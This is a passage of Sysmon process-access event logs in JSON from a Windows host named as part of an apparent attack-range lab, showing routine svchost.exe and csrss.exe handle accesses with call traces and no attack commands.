06:55:22.542","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11DA-5F25-0000-0010D0D10800}","TargetProcessId":"2792","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6100,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.542\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.542","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6101,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.542\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.542","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6102,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.542\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.542","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6103,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.542\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.542","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6104,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.542\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.542","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6105,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.542\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.542","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6106,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.542\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.542","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6107,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.542\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.542","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdl